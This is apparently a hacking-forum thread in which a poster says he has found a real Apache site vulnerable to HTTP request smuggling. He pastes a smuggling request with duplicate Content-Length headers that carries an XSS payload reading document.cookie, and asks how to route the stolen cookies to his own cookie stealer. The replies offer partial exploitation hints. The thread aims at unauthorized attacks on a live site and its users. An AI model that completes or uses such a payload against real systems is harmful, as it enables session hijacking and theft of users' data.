Hi, I found a site vulnerable to http request smuggling it runs an apache server. I have been looking up information on this all day yet the stuff that i find doesent explain it verry well! i know that it has to be sent to the site through packets but what i dont understand is how could i use Code: Code: 1 POST /some_script.jsp HTTP/1.0 2 Connection: Keep-Alive 3 Content-Type: application/x-www-form-urlencoded 4 Content-Length: 9 5 Content-Length: 204 6 7 this=thatPOST /vuln_page.jsp HTTP/1.0 8 Content-Type: application/x-www-form-urlencoded 9 Content-Length: 95 10 11 param1=value1&data=<script>alert("stealing%20your%20data:"% 2bdocument.cookie)</script>&foobar= Now i know that does xss but how would i get that to redirect to my cookie stealer. also would that be what im looking for if i want to exploit the server ? well thank you for spending the time to read this (and i did check google for the information, but it didnt sufice) sincerly Crimson-Jolt ps im using inet crack for spoofing [/code]
Sorry my English is bad)) So if $data take in cookie,then http request smuggling maybe done You can translate this Russian sentensis: Если переменная $data берется из cookies,то http request smuggling может получится.
as i know this bug is very stupid=) i found one day this bug in one script, and i couldn`t do something except giving me cookie by server named as i wanted=) there in docs were something that we could set header location or something like that..
